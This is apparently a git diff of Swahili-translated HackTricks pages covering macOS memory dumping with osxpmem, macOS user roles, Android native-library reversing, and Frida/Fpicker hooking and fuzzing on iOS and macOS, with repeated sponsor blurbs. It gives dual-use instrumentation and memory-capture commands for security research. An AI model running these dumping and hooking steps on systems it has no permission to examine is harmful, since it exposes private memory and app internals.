Faili iliyoko kwenye `/private/var/vm/sleepimage` ni muhimu wakati wa **hali ya kulala**. **Data kutoka kumbukumbu inahifadhiwa kwenye faili hii wakati OS X inalala**. Kwa kuamsha kompyuta, mfumo unapata data ya kumbukumbu kutoka kwenye faili hii, kuruhusu mtumiaji kuendelea pale walipoishia.
Ni muhimu kutambua kwamba kwenye mifumo ya MacOS ya kisasa, faili hii kawaida imefichwa kwa sababu za usalama, ikifanya kupona kuwa ngumu.
* Ili kuthibitisha ikiwa uchawi umewezeshwa kwa sleepimage, amri `sysctl vm.swapusage` inaweza kutumika. Hii itaonyesha ikiwa faili imefichwa.
### Kumbukumbu ya Shinikizo la Kumbukumbu
### Kumbukumbu za Shinikizo la Kumbukumbu
Faili nyingine muhimu inayohusiana na kumbukumbu kwenye mifumo ya MacOS ni **kumbukumbu ya shinikizo la kumbukumbu**. Kumbukumbu hizi ziko katika `/var/log` na zina habari za kina kuhusu matumizi ya kumbukumbu ya mfumo na matukio ya shinikizo. Zinaweza kuwa muhimu hasa kwa kugundua masuala yanayohusiana na kumbukumbu au kuelewa jinsi mfumo unavyosimamia kumbukumbu kwa muda.
Faili nyingine muhimu inayohusiana na kumbukumbu kwenye mifumo ya MacOS ni **kumbukumbu za shinikizo la kumbukumbu**. Kumbukumbu hizi ziko katika `/var/log` na zina habari za kina kuhusu matumizi ya kumbukumbu ya mfumo na matukio ya shinikizo. Zinaweza kuwa muhimu hasa kwa kugundua masuala yanayohusiana na kumbukumbu au kuelewa jinsi mfumo unavyosimamia kumbukumbu kwa muda.
## Kudondosha kumbukumbu na osxpmem
Ili kudondosha kumbukumbu kwenye kompyuta ya MacOS unaweza kutumia [**osxpmem**](https://github.com/google/rekall/releases/download/v1.5.1/osxpmem-2.1.post4.zip).
**Maelezo**: Maelekezo yafuatayo yatafanya kazi kwa Macs zenye muundo wa Intel tu. Zana hii sasa imehifadhiwa na toleo la mwisho lilikuwa mwaka 2017. Binari iliyopakuliwa kwa kutumia maelekezo yaliyotolewa inalenga chips za Intel kwani Apple Silicon haikuwepo mwaka 2017. Inaweza kuwa inawezekana kuchakata binari kwa muundo wa arm64 lakini utalazimika kujaribu mwenyewe.
**Maelezo**: Maelekezo yafuatayo yatafanya kazi kwa Macs zenye muundo wa Intel tu. Zana hii sasa imehifadhiwa na toleo la mwisho lilikuwa mwaka 2017. Binari iliyopakuliwa kwa kutumia maelekezo yaliyotolewa hapa inalenga chips za Intel kwani Apple Silicon haikuwepo mwaka 2017. Inaweza kuwa inawezekana kuchakata binari kwa muundo wa arm64 lakini utalazimika kujaribu mwenyewe.
```bash
#Dump raw format
sudo osxpmem.app/osxpmem --format raw -o /tmp/dump_mem
@ -76,9 +76,9 @@ cd /tmp; wget https://github.com/google/rekall/releases/download/v1.5.1/osxpmem-
```
{% endcode %}
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malwares za kuiba**.

View file

@ -2,7 +2,7 @@
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka mwanzo hadi kuwa shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze kuhusu udukuzi wa AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
@ -10,17 +10,17 @@ Njia nyingine za kusaidia HackTricks:
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malwares za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba taarifa.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na zisizo za habari.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
@ -35,7 +35,7 @@ Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
```bash
_amavisd, _analyticsd, _appinstalld, _appleevents, _applepay, _appowner, _appserver, _appstore, _ard, _assetcache, _astris, _atsserver, _avbdeviced, _calendar, _captiveagent, _ces, _clamav, _cmiodalassistants, _coreaudiod, _coremediaiod, _coreml, _ctkd, _cvmsroot, _cvs, _cyrus, _datadetectors, _demod, _devdocs, _devicemgr, _diskimagesiod, _displaypolicyd, _distnote, _dovecot, _dovenull, _dpaudio, _driverkit, _eppc, _findmydevice, _fpsd, _ftp, _fud, _gamecontrollerd, _geod, _hidd, _iconservices, _installassistant, _installcoordinationd, _installer, _jabber, _kadmin_admin, _kadmin_changepw, _knowledgegraphd, _krb_anonymous, _krb_changepw, _krb_kadmin, _krb_kerberos, _krb_krbtgt, _krbfast, _krbtgt, _launchservicesd, _lda, _locationd, _logd, _lp, _mailman, _mbsetupuser, _mcxalr, _mdnsresponder, _mobileasset, _mysql, _nearbyd, _netbios, _netstatistics, _networkd, _nsurlsessiond, _nsurlstoraged, _oahd, _ondemand, _postfix, _postgres, _qtss, _reportmemoryexception, _rmd, _sandbox, _screensaver, _scsd, _securityagent, _softwareupdate, _spotlight, _sshd, _svn, _taskgated, _teamsserver, _timed, _timezone, _tokend, _trustd, _trustevaluationagent, _unknown, _update_sharing, _usbmuxd, _uucp, _warmd, _webauthserver, _windowserver, _www, _wwwproxy, _xserverdocs
```
* **Mgeni**: Akaunti kwa wageni wenye ruhusa kali
* **Mgeni**: Akaunti kwa wageni wenye ruhusa kali sana
{% code overflow="wrap" %}
```bash
@ -44,12 +44,12 @@ for i in "${state[@]}"; do sysadminctl -"${i}" status; done;
```
{% endcode %}
* **Hakuna mtu**: Mchakato unatekelezwa na mtumiaji huyu wakati idhini chache zinahitajika
* **Hakuna mtu**: Mchakato unatekelezwa na mtumiaji huyu wakati ruhusa chache zinahitajika
* **Root**
### Mamlaka ya Mtumiaji
### Ruhusa za Mtumiaji
* **Mtumiaji wa Kawaida:** Msingi wa watumiaji. Mtumiaji huyu anahitaji idhini kutoka kwa mtumiaji wa usimamizi anapojaribu kufunga programu au kutekeleza kazi nyingine za juu. Hawawezi kufanya hivyo kwa kujitegemea.
* **Mtumiaji wa Usimamizi**: Mtumiaji ambaye kwa kawaida anafanya kazi kama mtumiaji wa kawaida lakini pia anaruhusiwa kutekeleza vitendo vya msingi kama vile kufunga programu na kazi nyingine za usimamizi. Wote wanaoingia kwenye kikundi cha usimamizi wanapewa **upatikanaji wa root kupitia faili ya sudoers**.
* **Root**: Root ni mtumiaji anayeruhusiwa kutekeleza karibu kitendo chochote (kuna vizuizi vilivyowekwa na ulinzi kama Ulinzi wa Uadilifu wa Mfumo).
* Kwa mfano root hataweza kuweka faili ndani ya `/System`
* **Mtumiaji wa Kawaida**: Msingi wa watumiaji. Mtumiaji huyu anahitaji ruhusa zilizotolewa na mtumiaji wa admin anapojaribu kufunga programu au kutekeleza kazi nyingine za juu. Hawawezi kufanya hivyo peke yao.
* **Mtumiaji wa Admin**: Mtumiaji ambaye kwa kawaida anafanya kazi kama mtumiaji wa kawaida lakini pia anaruhusiwa kutekeleza vitendo vya root kama vile kufunga programu na kazi nyingine za utawala. Watumiaji wote wanaoingia kwenye kikundi cha admin wanapewa **upatikanaji wa root kupitia faili ya sudoers**.
* **Root**: Root ni mtumiaji anayeruhusiwa kutekeleza karibu kitendo chochote (kuna vizuizi vilivyowekwa na ulinzi kama System Integrity Protection).
* Kwa mfano root hawezi kuweka faili ndani ya `/System`

View file

@ -6,21 +6,21 @@
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** kuchunguza ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** kuchunguza ikiwa kampuni au wateja wake wameathiriwa na **malwares za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za wizi wa habari.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malwares za wizi wa habari.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
@ -30,43 +30,69 @@ Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
**Kwa habari zaidi angalia: [https://maddiestone.github.io/AndroidAppRE/reversing\_native\_libs.html](https://maddiestone.github.io/AndroidAppRE/reversing\_native\_libs.html)**
Programu za Android zinaweza kutumia maktaba za asili, kwa kawaida zilizoandikwa kwa C au C++, kwa kazi za msingi za utendaji. Wabunifu wa programu hasidi pia hutumia maktaba hizi, kwani ni ngumu kuzigeuza kuliko bytecode ya DEX. Sehemu hii inasisitiza ujuzi wa kugeuza maktaba za asili zilizobinafsishwa kwa Android, badala ya kufundisha lugha za mkutano. Toleo la ARM na x86 la maktaba hutolewa kwa utangamano.
Programu za Android zinaweza kutumia maktaba za asili, kwa kawaida zilizoandikwa kwa C au C++, kwa kazi muhimu za utendaji. Wabunifu wa programu hasidi pia hutumia maktaba hizi, kwani ni ngumu kuzibua kuliko bytecode ya DEX. Sehemu hii inasisitiza ujuzi wa kugeuza mwelekeo uliolengwa kwa Android, badala ya kufundisha lugha za mkutano. Toleo la ARM na x86 la maktaba hutolewa kwa utangamano.
### Mambo Muhimu:
- **Maktaba za Asili katika Programu za Android:**
- Hutumiwa kwa kazi zenye mahitaji makubwa ya utendaji.
- Zimeandikwa kwa C au C++, hivyo kugeuza ni changamoto.
- Zinapatikana katika muundo wa `.so` (faili za kushirikishwa), sawa na programu za Linux.
- Wabunifu wa malware wanapendelea nambari za asili ili kufanya uchambuzi kuwa mgumu.
- Zimeandikwa kwa C au C++, hivyo kuzibua ni changamoto.
- Zinapatikana kwa muundo wa `.so` (faili za kushirikishwa), sawa na programu za Linux.
- Wabunifu wa programu hasidi hupendelea namna ya asili ili kufanya uchambuzi kuwa mgumu.
- **Kiolesura cha Java Native (JNI) & NDK ya Android:**
- JNI inaruhusu njia za Java kutekelezwa kwa nambari za asili.
- NDK ni seti ya zana maalum ya Android kutunga nambari za asili.
- JNI na NDK hupitisha nambari za Java (au Kotlin) na maktaba za asili.
- JNI inaruhusu njia za Java kutekelezwa kwa namna ya asili.
- NDK ni seti ya zana maalum ya Android kutunga namna ya asili.
- JNI na NDK hupitisha namna ya Java (au Kotlin) na maktaba za asili.
- **Kupakia na Kutekeleza Maktaba:**
- Maktaba hupakiwa kwenye kumbukumbu kwa kutumia `System.loadLibrary` au `System.load`.
- JNI_OnLoad inatekelezwa wakati wa kupakia maktaba.
- Njia za asili zilizotangazwa kwa Java zinahusishwa na kazi za asili, kuruhusu utekelezaji.
- Njia za asili zilizotangazwa na Java zinahusishwa na kazi za asili, kuruhusu utekelezaji.
- **Kuunganisha Njia za Java na Kazi za Asili:**
- **Unganishaji wa Kudumu:** Majina ya kazi katika maktaba za asili yanalingana na muundo maalum, kuruhusu uunganishaji wa moja kwa moja.
- **Unganishaji wa Stesheni:** Hutumia `RegisterNatives` kwa uunganishaji, kutoa mabadiliko katika majina ya kazi na muundo.
- **Unganishaji wa Kudumu:** Majina ya kazi kwenye maktaba za asili yanalingana na muundo maalum, kuruhusu kuunganisha moja kwa moja.
- **Unganishaji wa Stesheni:** Hutumia `RegisterNatives` kwa kuunganisha, kutoa mabadiliko katika majina ya kazi na muundo.
- **Zana na Mbinu za Kugeuza:**
- **Zana na Mbinu za Kugeuza Mwelekeo:**
- Zana kama Ghidra na IDA Pro husaidia kuchambua maktaba za asili.
- `JNIEnv` ni muhimu kwa kuelewa njia za JNI na mwingiliano.
- Mazoezi yanatolewa kufanya mazoezi ya kupakia maktaba, kuunganisha njia, na kutambua kazi za asili.
### Vyanzo:
- **Kujifunza Mkutano wa ARM:**
- **Kujifunza Mkusanyiko wa ARM:**
- Inapendekezwa kwa uelewa wa kina wa muundo wa msingi.
- [Misingi ya Mkutano wa ARM](https://azeria-labs.com/writing-arm-assembly-part-1/) kutoka Azeria Labs inapendekezwa.
- [Misingi ya Mkusanyiko wa ARM](https://azeria-labs.com/writing-arm-assembly-part-1/) kutoka Azeria Labs inapendekezwa.
- **Hati za JNI & NDK:**
- [Maelezo ya JNI ya Oracle](https://docs.oracle.com/javase/7/docs/technotes/guides/jni/spec/jniTOC.html)
- [Vidokezo vya JNI vya Android](https://developer.android.com/training/articles/perf-jni)
- [Kuanza na NDK](https://developer.android.com/ndk/guides/)
- **Kupeleleza Maktaba za Asili:**
- [Kupeleleza Maktaba za Asili za Android Kwa Kutumia JEB Decompiler](https://medium.com/@shubhamsonani/how-to-debug-android-native-libraries-using-jeb-decompiler-eec681a22cf3)
- **Kuchunguza Maktaba za Asili:**
- [Kuchunguza Maktaba za Asili za Android Kwa Kutumia JEB Decompiler](https://medium.com/@shubhamsonani/how-to-debug-android-native-libraries-using-jeb-decompiler-eec681a22cf3)
### [WhiteIntel](https://whiteintel.io)
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** kuchunguza ikiwa kampuni au wateja wake wameathiriwa na **malwares za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malwares za wizi wa habari.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>

View file

@ -6,7 +6,7 @@
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
@ -14,9 +14,9 @@ Njia nyingine za kusaidia HackTricks:
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za kuiba**.
@ -30,22 +30,22 @@ Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
## Kusakinisha Frida
**Hatua za kusakinisha Frida kwenye kifaa kilichofunguliwa kwa Jailbreak:**
**Hatua za kusakinisha Frida kwenye kifaa kilichofanyiwa Jailbreak:**
1. Fungua programu ya Cydia/Sileo.
2. Nenda kwa Usimamizi -> Vyanzo -> Hariri -> Ongeza.
3. Ingiza "https://build.frida.re" kama URL.
4. Nenda kwenye chanzo cha Frida kilichoongezwa hivi karibuni.
4. Nenda kwenye chanzo kipya cha Frida kilichoongezwa.
5. Sakinisha pakiti ya Frida.
Ikiwa unatumia **Corellium** utahitaji kupakua kutolewa kwa Frida kutoka [https://github.com/frida/frida/releases](https://github.com/frida/frida/releases) (`frida-gadget-[yourversion]-ios-universal.dylib.gz`) na kufungua na kunakili kwenye eneo la dylib ambalo Frida inahitaji, k.m.: `/Users/[youruser]/.cache/frida/gadget-ios.dylib`
Baada ya kusakinishwa, unaweza kutumia amri **`frida-ls-devices`** kwenye PC yako na kuhakikisha kuwa kifaa kinaonekana (PC yako inahitaji kuweza kufikia).\
Tumia pia **`frida-ps -Uia`** kuchunguza michakato inayoendeshwa kwenye simu.
Tumia pia **`frida-ps -Uia`** kuchunguza michakato inayoendesha simu.
## Frida bila kifaa kilichofunguliwa kwa Jailbreak & bila kufanya marekebisho kwenye programu
## Frida bila Kifaa kilichofanyiwa Jailbreak & bila kufanya marekebisho kwenye programu
Angalia chapisho hili la blogu kuhusu jinsi ya kutumia Frida kwenye vifaa visivyofunguliwa kwa Jailbreak bila kufanya marekebisho kwenye programu: [https://mrbypass.medium.com/unlocking-potential-exploring-frida-objection-on-non-jailbroken-devices-without-application-ed0367a84f07](https://mrbypass.medium.com/unlocking-potential-exploring-frida-objection-on-non-jailbroken-devices-without-application-ed0367a84f07)
Angalia chapisho hili la blogu kuhusu jinsi ya kutumia Frida kwenye vifaa visivyofanyiwa Jailbreak bila kufanya marekebisho kwenye programu: [https://mrbypass.medium.com/unlocking-potential-exploring-frida-objection-on-non-jailbroken-devices-without-application-ed0367a84f07](https://mrbypass.medium.com/unlocking-potential-exploring-frida-objection-on-non-jailbroken-devices-without-application-ed0367a84f07)
## Usakinishaji wa Mteja wa Frida
@ -79,11 +79,11 @@ frida-trace -U -W <if-plugin-bin> -m '*[* *]'
```
### Pata madarasa yote na njia
* Kukamilisha moja kwa moja: Tekeleza `frida -U <program>`
* Kukamilisha kiotomatiki: Tekeleza tu `frida -U <programu>`
<figure><img src="../../.gitbook/assets/image (1156).png" alt=""><figcaption></figcaption></figure>
* Pata **madarasa** yote yanayopatikana (pambanua kwa herufi)
* Pata **madarasa** yote yanayopatikana (chuja kwa herufi)
{% code title="/tmp/script.js" %}
```javascript
@ -105,7 +105,9 @@ console.log("Objective-C runtime is not available.");
```
{% endcode %}
* Pata **njia zote** za **darasa** (panga kwa kutumia herufi)
* Pata **njia zote** za **darasa** (panga kwa kamba)
{% code title="/tmp/script.js" %}
```javascript
// frida -U <program> -l /tmp/script.js
@ -203,7 +205,7 @@ Stalker.flush(); // this is important to get all events
});
```
{% hint style="danger" %}
Hii ni ya kuvutia kwa madhumuni ya kutatua matatizo lakini kwa fuzzing, kuwa kila wakati **`.follow()`** na **`.unfollow()`** ni ya ufanisi sana.
Hii ni ya kuvutia kwa madhumuni ya kutatua matatizo lakini kwa fuzzing, kuwa kila wakati **`.follow()`** na **`.unfollow()`** ni ya ufanisi mdogo.
{% endhint %}
## [Fpicker](https://github.com/ttdennis/fpicker)
@ -239,9 +241,9 @@ mkdir -p examples/wg-log/in # For starting inputs
# Create at least 1 input for the fuzzer
echo Hello World > examples/wg-log/in/0
```
* **Skripti ya Fuzzer** (`mifano/wg-log/myfuzzer.js`):
* **Skripti ya Fuzzer** (`examples/wg-log/myfuzzer.js`):
{% code title="mifano/wg-log/myfuzzer.js" %}
{% code title="examples/wg-log/myfuzzer.js" %}
```javascript
// Import the fuzzer base class
import { Fuzzer } from "../../harness/fuzzer.js";
@ -321,18 +323,18 @@ fpicker -v --fuzzer-mode active -e attach -p <Program to fuzz> -D usb -o example
{% endcode %}
{% hint style="danger" %}
Katika kesi hii **hatuendi kuanza upya programu au kurejesha hali** baada ya kila mzigo. Kwa hivyo, ikiwa Frida inapata **kosa**, **matokeo ya kuingiza** baada ya mzigo huo pia yanaweza **kusababisha programu kugonga** (kwa sababu programu iko katika hali isiyo thabiti) hata kama **kuingiza haipaswi kusababisha** programu kugonga.
Katika kesi hii **hatuendi kuanza upya programu au kurejesha hali** baada ya kila mzigo. Kwa hivyo, ikiwa Frida inapata **kosa**, **vipimo vya baadaye** baada ya mzigo huo pia inaweza **kusababisha programu kugonga** (kwa sababu programu iko katika hali isiyo thabiti) hata ikiwa **kuingia haipaswi kusababisha** programu kugonga.
Zaidi ya hayo, Frida itaunganisha ishara za kipekee za iOS, kwa hivyo wakati **Frida inapata kosa**, labda **ripoti za kugonga za iOS hazitazalishwa**.
Ili kuzuia hili, kwa mfano, tunaweza kuanza upya programu baada ya kila kugonga cha Frida.
Ili kuzuia hili, kwa mfano, tunaweza kuanza upya programu baada ya kila kosa la Frida.
{% endhint %}
### Kumbukumbu & Kugonga
### Kumbukumbu & Migongano
Unaweza kuangalia **konsoli ya macOS** au **cli ya `log`** kuangalia kumbukumbu za macOS.\
Unaweza kuangalia **konsoli ya macOS** au **`log`** cli kuangalia kumbukumbu za macOS.\
Unaweza pia kuangalia kumbukumbu kutoka iOS kwa kutumia **`idevicesyslog`**.\
Baadhi ya kumbukumbu zitakosa taarifa kwa kuongeza **`<binafsi>`**. Ili kuonyesha taarifa zote unahitaji kusakinisha wasifu fulani kutoka [https://developer.apple.com/bug-reporting/profiles-and-logs/](https://developer.apple.com/bug-reporting/profiles-and-logs/) kuwezesha taarifa hizo za kibinafsi.
Baadhi ya kumbukumbu zitakosa habari kwa kuongeza **`<binafsi>`**. Ili kuonyesha habari zote unahitaji kusakinisha wasifu fulani kutoka [https://developer.apple.com/bug-reporting/profiles-and-logs/](https://developer.apple.com/bug-reporting/profiles-and-logs/) kuwezesha habari hiyo ya kibinafsi.
Ikiwa hujui cha kufanya:
```sh
@ -351,14 +353,14 @@ killall -9 logd
Unaweza kuangalia ajali katika:
* **iOS**
* Mipangilio → Faragha → Takwimu za Uchambuzi na Kuboresha → Takwimu za Uchambuzi
* Mipangilio → Faragha → Takwimu za Uchambuzi na Maboresho → Takwimu za Uchambuzi
* `/private/var/mobile/Library/Logs/CrashReporter/`
* **macOS**:
* `/Library/Logs/DiagnosticReports/`
* `~/Library/Logs/DiagnosticReports`
{% hint style="warning" %}
iOS inahifadhi ajali 25 za programu ile ile tu, hivyo unahitaji kusafisha hiyo au iOS itasita kuunda ajali.
iOS inahifadhi ajali 25 za programu ile ile tu, hivyo unahitaji kusafisha hiyo au iOS itaacha kuunda ajali.
{% endhint %}
## Mafunzo ya Frida kwa Android
@ -372,11 +374,11 @@ iOS inahifadhi ajali 25 za programu ile ile tu, hivyo unahitaji kusafisha hiyo a
* [https://www.briskinfosec.com/blogs/blogsdetail/Getting-Started-with-Frida](https://www.briskinfosec.com/blogs/blogsdetail/Getting-Started-with-Frida)
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa utendaji wa **bure** kuchunguza ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za kuiba**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na programu hasidi za kuiba taarifa.
@ -387,14 +389,14 @@ Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** hapa:
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze kuhusu kuvamia AWS kutoka mwanzo hadi kuwa shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* **Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>

View file

@ -14,9 +14,9 @@ Njia nyingine za kusaidia HackTricks:
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
